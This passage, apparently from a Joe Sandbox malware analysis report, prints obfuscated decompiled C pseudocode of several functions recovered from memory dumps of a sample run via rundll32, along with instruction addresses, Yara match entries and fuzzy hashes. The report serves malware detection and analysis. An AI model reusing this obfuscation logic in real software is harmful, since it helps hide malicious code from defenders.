				_v592 = _v592 ^ 0xb4c5443f;
				_v592 = _v592 ^ 0xeb638af6;
				_v624 = 0xda21;
				_v624 = _v624 / _t204;
				_t205 = 0x79;
				_v624 = _v624 / _t205;
				_v624 = _v624 | 0xd586b067;
				_v624 = _v624 ^ 0xd586ca9a;
				_v596 = 0x23f3;
				_v596 = _v596 << 0x10;
				_t206 = _v576;
				_v596 = _v596 * 0x21;
				_v596 = _v596 ^ 0xa2536537;
				_v604 = 0xb869;
				_v604 = _v604 + 0x1500;
				_v604 = _v604 ^ 0xdf411415;
				_v604 = _v604 ^ 0xdf41df50;
				_v580 = 0x91ab;
				_v580 = _v580 | 0x75cd6eed;
				_v580 = _v580 ^ 0x75cdc157;
				_v584 = 0x41c3;
				_v584 = _v584 | 0x7a0b54b1;
				_v584 = _v584 + 0x22a4;
				_v584 = _v584 ^ 0x7a0b1750;
				_v588 = 0xc9d8;
				_v588 = _v588 << 6;
				_v588 = _v588 >> 7;
				_v588 = _v588 ^ 0x000064ee;
				do {
					while(_t178 != 0x5ded331) {
						if(_t178 != 0xe6392eb) {
							if(_t178 == 0x26ceaef1) {
								return E01FFF1ED(_v596, _v604, _v580, _v584, _t206);
							}
							if(_t178 == 0x294df979) {
								_t174 = E0200293E(_v572, _v616,  &_v556, _v592, _v624, _t206);
								_t209 =  &(_t209[4]);
								asm("sbb ecx, ecx");
								_t186 =  ~_t174 & 0x034cb45d;
								goto L9;
							} else {
								if(_t178 == 0x2a1b634e) {
									_t174 = _a8( &_v556, _t201);
									asm("sbb ecx, ecx");
									_t186 =  ~_t174 & 0x027f4a88;
									L9:
									_t178 = _t186 + 0x26ceaef1;
									continue;
								} else {
									if(_t178 != 0x32110b52) {
										goto L16;
									} else {
										_t178 = 0xe6392eb;
										continue;
									}
								}
							}
						}
						_t171 = E02002B68(_t178, _v588);
						_t206 = _t171;
						_t209 = _t209 - 0xc + 0x10;
						if(_t171 != 0xffffffff) {
							_t178 = 0x5ded331;
							continue;
						}
						return _t171;
						L20:
					}
					_v556 = 0x22c;
					if(E02001623( &_v556, _t206, _v608, _v612) == 0) {
						_t178 = 0x26ceaef1;
						goto L16;
					} else {
						_t178 = 0x2a1b634e;
						continue;
					}
					goto L20;
					L16:
				} while (_t178 != 0x281e4e2f);
				return _t174;
			}

































                                                                      0x01ff2de9
                                                                      0x01ff2df0
                                                                      0x01ff2df2
                                                                      0x01ff2df9
                                                                      0x01ff2dfa
                                                                      0x01ff2dfb
                                                                      0x01ff2e00
                                                                      0x01ff2e05
                                                                      0x01ff2e08
                                                                      0x01ff2e12
                                                                      0x01ff2e1a
                                                                      0x01ff2e1f
                                                                      0x01ff2e27
                                                                      0x01ff2e2b
                                                                      0x01ff2e33
                                                                      0x01ff2e41
                                                                      0x01ff2e46
                                                                      0x01ff2e4c
                                                                      0x01ff2e54
                                                                      0x01ff2e5c
                                                                      0x01ff2e64
                                                                      0x01ff2e6c
                                                                      0x01ff2e74
                                                                      0x01ff2e79
                                                                      0x01ff2e81
                                                                      0x01ff2e89
                                                                      0x01ff2e91
                                                                      0x01ff2e99
                                                                      0x01ff2e9e
                                                                      0x01ff2ea6
                                                                      0x01ff2eb2
                                                                      0x01ff2eb7
                                                                      0x01ff2ebd
                                                                      0x01ff2ec5
                                                                      0x01ff2ecd
                                                                      0x01ff2eda
                                                                      0x01ff2edd
                                                                      0x01ff2ee1
                                                                      0x01ff2ee9
                                                                      0x01ff2ef1
                                                                      0x01ff2ef9
                                                                      0x01ff2f01
                                                                      0x01ff2f06
                                                                      0x01ff2f0e
                                                                      0x01ff2f1b
                                                                      0x01ff2f1f
                                                                      0x01ff2f27
                                                                      0x01ff2f2f
                                                                      0x01ff2f37
                                                                      0x01ff2f3f
                                                                      0x01ff2f47
                                                                      0x01ff2f4f
                                                                      0x01ff2f57
                                                                      0x01ff2f67
                                                                      0x01ff2f6f
                                                                      0x01ff2f72
                                                                      0x01ff2f76
                                                                      0x01ff2f7e
                                                                      0x01ff2f86
                                                                      0x01ff2f8e
                                                                      0x01ff2fa2
                                                                      0x01ff2fa6
                                                                      0x01ff2faa
                                                                      0x01ff2fb2
                                                                      0x01ff2fba
                                                                      0x01ff2fc2
                                                                      0x01ff2fca
                                                                      0x01ff2fd2
                                                                      0x01ff2fda
                                                                      0x01ff2fe2
                                                                      0x01ff2fea
                                                                      0x01ff2ff2
                                                                      0x01ff2ffa
                                                                      0x01ff3002
                                                                      0x01ff300a
                                                                      0x01ff3012
                                                                      0x01ff3017
                                                                      0x01ff301c
                                                                      0x01ff3024
                                                                      0x01ff3024
                                                                      0x01ff3032
                                                                      0x01ff3036
                                                                      0x00000000
                                                                      0x01ff3126
                                                                      0x01ff3042
                                                                      0x01ff3092
                                                                      0x01ff3097
                                                                      0x01ff309e
                                                                      0x01ff30a0
                                                                      0x00000000
                                                                      0x01ff3044
                                                                      0x01ff304a
                                                                      0x01ff3065
                                                                      0x01ff3070
                                                                      0x01ff3072
                                                                      0x01ff3078
                                                                      0x01ff3078
                                                                      0x00000000
                                                                      0x01ff304c
                                                                      0x01ff3052
                                                                      0x00000000
                                                                      0x01ff3058
                                                                      0x01ff3058
                                                                      0x00000000
                                                                      0x01ff3058
                                                                      0x01ff3052
                                                                      0x01ff304a
                                                                      0x01ff3042
                                                                      0x01ff30bf
                                                                      0x01ff30c4
                                                                      0x01ff30c6
                                                                      0x01ff30cc
                                                                      0x01ff30ce
                                                                      0x00000000
                                                                      0x01ff30ce
                                                                      0x01ff3133
                                                                      0x00000000
                                                                      0x01ff3133
                                                                      0x01ff30db
                                                                      0x01ff30f4
                                                                      0x01ff3100
                                                                      0x00000000
                                                                      0x01ff30f6
                                                                      0x01ff30f6
                                                                      0x00000000
                                                                      0x01ff30f6
                                                                      0x00000000
                                                                      0x01ff3102
                                                                      0x01ff3102
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :&$VBp?$q5$L$d
                                                                      • API String ID: 0-1357951408
                                                                      • Opcode ID: 423d9219a06dae90452c3af43403f17738f56df53134a8a81c127abdb3eb428a
                                                                      • Instruction ID: 6cb3a994ae6459b05d1493f3ec34d1a4fbf94e598f0025bb66ad3526b7bbf76e
                                                                      • Opcode Fuzzy Hash: 423d9219a06dae90452c3af43403f17738f56df53134a8a81c127abdb3eb428a
                                                                      • Instruction Fuzzy Hash: 718164719083419BD358CE25D88985BBFF1BFC4768F004A1DF68A962A0D7B9CA08CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00232353, Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :&$VBp?$q5$L$d
                                                                      • API String ID: 0-1357951408
                                                                      • Opcode ID: 9625934489e2dad54f0a0194016c640e6ad5100f496de32f8f15a457e04f42a4
                                                                      • Instruction ID: 84a74fb69e9156b858384bff39ac040cb27367c5ed631b36efa1248e806faaec
                                                                      • Opcode Fuzzy Hash: 9625934489e2dad54f0a0194016c640e6ad5100f496de32f8f15a457e04f42a4
                                                                      • Instruction Fuzzy Hash: 518183B15183419BD358CE25D88A81FBBF0FBC4768F404A1CF58A962A0D3B8CA58CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02009DBF, Relevance: 6.4, Strings: 5, Instructions: 145COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E02009DBF() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t123;
				signed int _t126;
				signed int _t129;
				signed int _t130;
				void* _t131;
				signed int _t135;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t155;
				signed int _t157;
				signed int* _t158;

				_t158 =  &_v568;
				_v528 = 0x60d9f0;
				_t155 = 0;
				_t131 = 0x15228660;
				_v524 = 0;
				_v548 = 0xcd57;
				_t150 = 0x7d;
				_v548 = _v548 / _t150;
				_v548 = _v548 << 4;
				_v548 = _v548 ^ 0x00004d7f;
				_v568 = 0x7da6;
				_v568 = _v568 ^ 0x9d4dffd0;
				_v568 = _v568 + 0x4fb1;
				_v568 = _v568 ^ 0x61a60d8b;
				_v568 = _v568 ^ 0xfceba89c;
				_v564 = 0xc0eb;
				_v564 = _v564 + 0xfffff60a;
				_v564 = _v564 + 0x7921;
				_v564 = _v564 | 0xce5d4b47;
				_v564 = _v564 ^ 0xce5d5527;
				_v560 = 0xb537;
				_v560 = _v560 ^ 0xfff7bf7c;
				_v560 = _v560 ^ 0xfff72356;
				_v552 = 0x7344;
				_t151 = 0x5d;
				_v552 = _v552 / _t151;
				_v552 = _v552 ^ 0x4bec447d;
				_v552 = _v552 ^ 0x4bec1377;
				_v532 = 0x249f;
				_v532 = _v532 | 0xc4145615;
				_v532 = _v532 ^ 0xc4142924;
				_v536 = 0x1806;
				_t152 = 0x57;
				_t157 = _v560;
				_t130 = _v560;
				_v536 = _v536 * 0x50;
				_v536 = _v536 ^ 0x00078d58;
				_v556 = 0x1833;
				_v556 = _v556 << 0xc;
				_v556 = _v556 + 0xffff5490;
				_v556 = _v556 ^ 0x0182d013;
				_v540 = 0x2b82;
				_v540 = _v540 / _t152;
				_v540 = _v540 ^ 0x00005334;
				_v544 = 0xc7f0;
				_t153 = 0x6c;
				_t154 = _v560;
				_v544 = _v544 / _t153;
				_v544 = _v544 ^ 0x00002c79;
				do {
					while(_t131 != 0x1f7477) {
						if(_t131 == 0x2a2b494) {
							_t123 = E01FFA525(_v568, __eflags,  &_v520, _t154, _v564);
							_t158 =  &(_t158[3]);
							__eflags = _t123;
							if(__eflags == 0) {
								L18:
								return _t155;
							}
							_t131 = 0x1f7477;
							continue;
						}
						if(_t131 == 0x3351846) {
							_t126 = E02000CCD();
							_t154 = _t126;
							__eflags = _t126;
							if(__eflags == 0) {
								goto L18;
							}
							_t131 = 0x2a2b494;
							continue;
						}
						if(_t131 == 0x8686635) {
							_v568 = 0xbfc3;
							_t135 = 0x65;
							_v568 = _v568 / _t135;
							_v568 = _v568 | 0xe5cb59f9;
							_v568 = _v568 + 0xffffe272;
							_v568 = _v568 ^ 0xcfec3c93;
							__eflags = _t130 - _v568;
							if(_t130 == _v568) {
								_t155 = 1;
								__eflags = 1;
							}
							goto L18;
						}
						if(_t131 == 0x15228660) {
							_t131 = 0x3351846;
							continue;
						}
						if(_t131 != 0x2e9709f0) {
							goto L14;
						}
						_t129 = E01FF165C(_t157, _v536, _v556, _v540, _v544);
						_t158 =  &(_t158[3]);
						_t130 = _t129;
						_t131 = 0x8686635;
					}
					_t157 = E01FFBDCC( &_v520, _v560, _v552, _v532);
					_t131 = 0x2e9709f0;
					L14:
					__eflags = _t131 - 0x2a22e55c;
				} while (__eflags != 0);
				goto L18;
			}





























                                                                      0x02009dbf
                                                                      0x02009dc5
                                                                      0x02009dd5
                                                                      0x02009dd7
                                                                      0x02009ddc
                                                                      0x02009de0
                                                                      0x02009dec
                                                                      0x02009df1
                                                                      0x02009df7
                                                                      0x02009dfc
                                                                      0x02009e04
                                                                      0x02009e0c
                                                                      0x02009e14
                                                                      0x02009e1c
                                                                      0x02009e24
                                                                      0x02009e2c
                                                                      0x02009e34
                                                                      0x02009e3c
                                                                      0x02009e44
                                                                      0x02009e4c
                                                                      0x02009e54
                                                                      0x02009e5c
                                                                      0x02009e64
                                                                      0x02009e6c
                                                                      0x02009e78
                                                                      0x02009e7d
                                                                      0x02009e83
                                                                      0x02009e8b
                                                                      0x02009e93
                                                                      0x02009e9b
                                                                      0x02009ea3
                                                                      0x02009eab
                                                                      0x02009eb8
                                                                      0x02009ebb
                                                                      0x02009ebf
                                                                      0x02009ec3
                                                                      0x02009ec7
                                                                      0x02009ecf
                                                                      0x02009ed7
                                                                      0x02009edc
                                                                      0x02009ee4
                                                                      0x02009eec
                                                                      0x02009efc
                                                                      0x02009f00
                                                                      0x02009f08
                                                                      0x02009f14
                                                                      0x02009f17
                                                                      0x02009f1b
                                                                      0x02009f1f
                                                                      0x02009f27
                                                                      0x02009f27
                                                                      0x02009f39
                                                                      0x02009fb5
                                                                      0x02009fba
                                                                      0x02009fbd
                                                                      0x02009fbf
                                                                      0x0200a030
                                                                      0x0200a03b
                                                                      0x0200a03b
                                                                      0x02009fc1
                                                                      0x00000000
                                                                      0x02009fc1
                                                                      0x02009f41
                                                                      0x02009f91
                                                                      0x02009f96
                                                                      0x02009f98
                                                                      0x02009f9a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02009fa0
                                                                      0x00000000
                                                                      0x02009fa0
                                                                      0x02009f49
                                                                      0x02009ff7
                                                                      0x0200a007
                                                                      0x0200a00a
                                                                      0x0200a00e
                                                                      0x0200a016
                                                                      0x0200a01e
                                                                      0x0200a026
                                                                      0x0200a02a
                                                                      0x0200a02e
                                                                      0x0200a02e
                                                                      0x0200a02e
                                                                      0x00000000
                                                                      0x0200a02a
                                                                      0x02009f55
                                                                      0x02009f86
                                                                      0x00000000
                                                                      0x02009f86
                                                                      0x02009f5d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02009f75
                                                                      0x02009f7a
                                                                      0x02009f7d
                                                                      0x02009f7f
                                                                      0x02009f7f
                                                                      0x02009fe2
                                                                      0x02009fe4
                                                                      0x02009fe9
                                                                      0x02009fe9
                                                                      0x02009fe9
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !y$4S$\"*$y,$}DK
                                                                      • API String ID: 0-1385372798
                                                                      • Opcode ID: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
                                                                      • Instruction ID: 77e9d6bf44211a8b1516bdb94ad6bed79b269aced7a32c70c6e024884defe2e8
                                                                      • Opcode Fuzzy Hash: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
                                                                      • Instruction Fuzzy Hash: 6F5189715083418BE398CF24C58892FBBE1FBC8758F144A1EF599962A0D7B5CA49CF83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00249333, Relevance: 6.4, Strings: 5, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !y$4S$\"*$y,$}DK
                                                                      • API String ID: 0-1385372798
                                                                      • Opcode ID: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
                                                                      • Instruction ID: 3b9d027a5195e404b4edb673bddf9dad6efd999cebdfcac450c5ed3ab61cdd71
                                                                      • Opcode Fuzzy Hash: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
                                                                      • Instruction Fuzzy Hash: 6B5177715183428FD358CF24C58991FBBE1BBC8758F604A1EF58996260C7B4CA5A8F83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02009B4A, Relevance: 6.4, Strings: 5, Instructions: 143COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E02009B4A(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t139;
				intOrPtr _t141;
				intOrPtr _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t173;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t176;

				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_v16 = 0x24c8e6;
				_v12 = 0x512e7e;
				_v64 = 0xe6d4;
				_v64 = _v64 + 0xffffc62e;
				_v64 = _v64 ^ 0x62da4f4f;
				_v64 = _v64 + 0x4b4;
				_v64 = _v64 ^ 0x62daac72;
				_v36 = 0x1dac;
				_t151 = 0xc;
				_v36 = _v36 / _t151;
				_v36 = _v36 ^ 0x000026fb;
				_v60 = 0xf2ce;
				_v60 = _v60 + 0x7932;
				_t152 = 0x4d;
				_v60 = _v60 / _t152;
				_t153 = 0x3b;
				_v60 = _v60 * 0x21;
				_v60 = _v60 ^ 0x00008d5c;
				_v32 = 0x9fef;
				_v32 = _v32 ^ 0xbf11c352;
				_v32 = _v32 ^ 0xbf1108c7;
				_v40 = 0x93bf;
				_v40 = _v40 + 0xffffb4ac;
				_v40 = _v40 / _t153;
				_v40 = _v40 ^ 0x00007264;
				_v44 = 0x3ea3;
				_v44 = _v44 | 0x1bb7f55d;
				_v44 = _v44 << 1;
				_v44 = _v44 ^ 0x376fc359;
				_v24 = 0xe782;
				_v24 = _v24 + 0xffff9e28;
				_v24 = _v24 ^ 0x0000d291;
				_v28 = 0xff08;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x000057fc;
				_v48 = 0x3b3e;
				_v48 = _v48 << 9;
				_t154 = 0x19;
				_v48 = _v48 * 0x7b;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x00e3c1df;
				_v20 = 0x1063;
				_v20 = _v20 + 0xffffa595;
				_v20 = _v20 ^ 0xffffc157;
				_v52 = 0xa2f2;
				_v52 = _v52 >> 8;
				_v52 = _v52 + 0xffff5a4e;
				_v52 = _v52 + 0xb28b;
				_v52 = _v52 ^ 0x00000530;
				_v56 = 0x99a4;
				_v56 = _v56 / _t154;
				_v56 = _v56 + 0xfffff33a;
				_v56 = _v56 + 0xffffe1ed;
				_v56 = _v56 ^ 0xfffff62c;
				_t139 = E02001999();
				_t173 = _a4;
				_t175 = _t139;
				_v64 = 0x5a09;
				_v64 = _v64 + 0x27ad;
				_v64 = _v64 + 0xa7ad;
				_v64 = _v64 ^ 0x00012963;
				_t177 = _t173 + 0x24;
				_t150 = E01FF165C(_t173 + 0x24, _v60, _v32, _v40, _v44);
				_t141 =  *((intOrPtr*)(_t173 + 8));
				if(_t141 != _v64 && _t141 != _t175) {
					_t156 =  *((intOrPtr*)(_t173 + 0x18));
					if(_t156 != _v64 && _t156 != _t175) {
						_t174 = _a8;
						_t157 =  *_t174;
						if(E01FFE9C1(_t157, _t150) == 0) {
							_push(_t157);
							_t176 = E01FF54FB(0x224);
							if(_t176 != 0) {
								_t121 = _t176 + 0x1c; // 0x1c
								E020003F1(_v48, _v20, _t177, _t121, _v52, _v56);
								 *((intOrPtr*)(_t176 + 0x10)) = _t150;
								 *((intOrPtr*)(_t176 + 8)) =  *_t174;
								 *_t174 = _t176;
							}
						}
					}
				}
				return 1;
			}
































                                                                      0x02009b4d
                                                                      0x02009b54
                                                                      0x02009b59
                                                                      0x02009b61
                                                                      0x02009b69
                                                                      0x02009b70
                                                                      0x02009b77
                                                                      0x02009b7e
                                                                      0x02009b85
                                                                      0x02009b8c
                                                                      0x02009b9e
                                                                      0x02009ba3
                                                                      0x02009ba9
                                                                      0x02009bb1
                                                                      0x02009bb9
                                                                      0x02009bc5
                                                                      0x02009bca
                                                                      0x02009bd5
                                                                      0x02009bd8
                                                                      0x02009bdc
                                                                      0x02009be4
                                                                      0x02009bec
                                                                      0x02009bf4
                                                                      0x02009bfc
                                                                      0x02009c04
                                                                      0x02009c14
                                                                      0x02009c18
                                                                      0x02009c20
                                                                      0x02009c28
                                                                      0x02009c30
                                                                      0x02009c34
                                                                      0x02009c3c
                                                                      0x02009c44
                                                                      0x02009c4c
                                                                      0x02009c54
                                                                      0x02009c5c
                                                                      0x02009c61
                                                                      0x02009c69
                                                                      0x02009c71
                                                                      0x02009c7b
                                                                      0x02009c7c
                                                                      0x02009c80
                                                                      0x02009c85
                                                                      0x02009c8d
                                                                      0x02009c95
                                                                      0x02009c9d
                                                                      0x02009ca5
                                                                      0x02009cad
                                                                      0x02009cb2
                                                                      0x02009cba
                                                                      0x02009cc2
                                                                      0x02009cca
                                                                      0x02009cd8
                                                                      0x02009cdc
                                                                      0x02009ce4
                                                                      0x02009cec
                                                                      0x02009cfc
                                                                      0x02009d01
                                                                      0x02009d05
                                                                      0x02009d07
                                                                      0x02009d0f
                                                                      0x02009d17
                                                                      0x02009d1f
                                                                      0x02009d27
                                                                      0x02009d41
                                                                      0x02009d46
                                                                      0x02009d4d
                                                                      0x02009d53
                                                                      0x02009d5a
                                                                      0x02009d60
                                                                      0x02009d66
                                                                      0x02009d6f
                                                                      0x02009d7e
                                                                      0x02009d84
                                                                      0x02009d89
                                                                      0x02009d8f
                                                                      0x02009da0
                                                                      0x02009da5
                                                                      0x02009dad
                                                                      0x02009db0
                                                                      0x02009db0
                                                                      0x02009d89
                                                                      0x02009d6f
                                                                      0x02009d5a
                                                                      0x02009dbc

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Z$2y$>;$dr$~.Q
                                                                      • API String ID: 0-1863639504
                                                                      • Opcode ID: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
                                                                      • Instruction ID: 14a1cab2476825c75700d6cdc8dbe5f035e246d51edb2eedc6a1819f2404edbf
                                                                      • Opcode Fuzzy Hash: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
                                                                      • Instruction Fuzzy Hash: 356122725083429FE384DF25C48951BBBF1BBE4758F105A1DF0E5962A0D3B8DA49CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002490BE, Relevance: 6.4, Strings: 5, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Z$2y$>;$dr$~.Q
                                                                      • API String ID: 0-1863639504
                                                                      • Opcode ID: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
                                                                      • Instruction ID: 4d890f59e7929f5096b40aa96a5aef9d67594f59db4a56c87ac0d3582440e07a
                                                                      • Opcode Fuzzy Hash: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
                                                                      • Instruction Fuzzy Hash: AE6121715083429FD388DF25C48951BBBE1BFD4368F505A1DF0D59A2A0D3B8DA99CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFBB96, Relevance: 6.4, Strings: 5, Instructions: 134COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E01FFBB96(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _t106;
				void* _t118;
				void* _t123;
				void* _t125;
				intOrPtr _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				void* _t148;

				_push(_a8);
				_t141 = _a4;
				_t123 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t106);
				_v80 = 0x2da5ed;
				_t148 = _t147 + 0x10;
				_t142 = 0;
				_v76 = 0;
				_t125 = 0x345de67e;
				_v72 = 0;
				_v100 = 0x5d99;
				_t143 = 9;
				_v100 = _v100 / _t143;
				_v100 = _v100 + 0x3ccb;
				_v100 = _v100 ^ 0x0000340e;
				_v84 = 0xb7f0;
				_v84 = _v84 >> 6;
				_v84 = _v84 ^ 0x00004e6b;
				_v104 = 0x2472;
				_v104 = _v104 << 0xb;
				_v104 = _v104 | 0x2ee3a515;
				_v104 = _v104 ^ 0x2fe3eebe;
				_v108 = 0xd2e1;
				_v108 = _v108 + 0xffff0d62;
				_t144 = 0x14;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x0cccdcb2;
				_v112 = 0x5926;
				_v112 = _v112 + 0xdeb5;
				_v112 = _v112 << 6;
				_v112 = _v112 << 0xc;
				_v112 = _v112 ^ 0xdf6c425e;
				_v96 = 0x379b;
				_v96 = _v96 << 1;
				_t145 = 0x6d;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x001e434e;
				_v116 = 0x863a;
				_v116 = _v116 * 0x52;
				_v116 = _v116 + 0xffff0085;
				_v116 = _v116 + 0x7cb6;
				_v116 = _v116 ^ 0x002a75a4;
				_v120 = 0x5588;
				_v120 = _v120 / _t145;
				_v120 = _v120 << 1;
				_v120 = _v120 << 3;
				_v120 = _v120 ^ 0x00002108;
				_v88 = 0xce65;
				_v88 = _v88 ^ 0x25948ee5;
				_v88 = _v88 * 0x2e;
				_v88 = _v88 ^ 0xc0a3e1fe;
				_v92 = 0x75c8;
				_v92 = _v92 + 0x1df4;
				_v92 = _v92 + 0xffff92c4;
				_v92 = _v92 ^ 0x00004c1f;
				do {
					while(_t125 != 0x128fa6f3) {
						if(_t125 == 0x1c314bcc) {
							E01FFFEE3(_t123,  &_v68, _v100, _v84, _v104, _v108);
							_t148 = _t148 + 0x10;
							_t125 = 0x128fa6f3;
							continue;
						} else {
							if(_t125 == 0x1efca616) {
								__eflags = E01FFBAA2( &_v68, _v88, _v92, _t141 + 8);
								_t142 =  !=  ? 1 : _t142;
							} else {
								if(_t125 != 0x345de67e) {
									goto L10;
								} else {
									_t125 = 0x1c314bcc;
									continue;
								}
							}
						}
						L13:
						return _t142;
					}
					_t118 = E01FFF914(_v112, _v96, __eflags, _v116, _t141, _v120,  &_v68);
					_t148 = _t148 + 0x10;
					__eflags = _t118;
					if(__eflags == 0) {
						_t125 = 0xd121e29;
						goto L10;
					} else {
						_t125 = 0x1efca616;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t125 - 0xd121e29;
				} while (__eflags != 0);
				goto L13;
			}



























                                                                      0x01ffbb9d
                                                                      0x01ffbba4
                                                                      0x01ffbbab
                                                                      0x01ffbbad
                                                                      0x01ffbbae
                                                                      0x01ffbbaf
                                                                      0x01ffbbb0
                                                                      0x01ffbbb5
                                                                      0x01ffbbbd
                                                                      0x01ffbbc0
                                                                      0x01ffbbc4
                                                                      0x01ffbbc8
                                                                      0x01ffbbcd
                                                                      0x01ffbbd1
                                                                      0x01ffbbdf
                                                                      0x01ffbbe4
                                                                      0x01ffbbea
                                                                      0x01ffbbf2
                                                                      0x01ffbbfa
                                                                      0x01ffbc02
                                                                      0x01ffbc07
                                                                      0x01ffbc0f
                                                                      0x01ffbc17
                                                                      0x01ffbc1c
                                                                      0x01ffbc24
                                                                      0x01ffbc2c
                                                                      0x01ffbc34
                                                                      0x01ffbc40
                                                                      0x01ffbc45
                                                                      0x01ffbc4b
                                                                      0x01ffbc53
                                                                      0x01ffbc5b
                                                                      0x01ffbc63
                                                                      0x01ffbc68
                                                                      0x01ffbc6d
                                                                      0x01ffbc75
                                                                      0x01ffbc7d
                                                                      0x01ffbc86
                                                                      0x01ffbc87
                                                                      0x01ffbc8b
                                                                      0x01ffbc93
                                                                      0x01ffbca0
                                                                      0x01ffbca4
                                                                      0x01ffbcac
                                                                      0x01ffbcb4
                                                                      0x01ffbcbc
                                                                      0x01ffbccf
                                                                      0x01ffbcd3
